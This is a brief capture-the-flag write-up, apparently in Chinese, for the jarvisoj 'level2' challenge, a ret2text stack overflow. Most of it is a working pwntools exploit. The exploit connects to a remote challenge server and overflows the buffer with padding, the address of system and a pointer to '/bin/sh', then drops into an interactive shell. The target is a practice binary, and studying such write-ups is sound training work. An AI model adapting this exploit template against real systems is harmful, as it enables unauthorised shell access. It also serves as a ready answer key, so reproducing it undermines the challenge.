jarvisoj_level2
简单的栈溢出 ROP（ret2text）。
程序中存在 system 函数和 /bin/sh 字符串。
直接给出 exp：
from pwn import *
context.log_level = 'debug'

# Target connection. The author's local alternative is kept for reference:
# sh = process('./level2')
sh = remote('node4.buuoj.cn', 29799)

# Addresses taken from the writeup above (values as given on the page).
p_binsh = 0x804a024          # address of the "/bin/sh" string
# p_system = 0x804849e       # author's alternative candidate, unused
p_system = 0x8048320         # address used for system

# Read whatever the program prints first, before sending anything.
sh.recv()

# Payload layout, mirroring the original "retaddr retaddr2 argv0" comment:
# 0x88 + 4 filler bytes, then the return address, a second return address
# that is never used, and the argument pointer.
pieces = [
    b'm' * 0x88,        # filler
    b'z' * 4,           # filler
    p32(p_system),      # retaddr
    b'Mz11',            # retaddr2 (not used)
    p32(p_binsh),       # argv0
]
payload = b''.join(pieces)

sh.sendline(payload)
sh.interactive()
sh.close()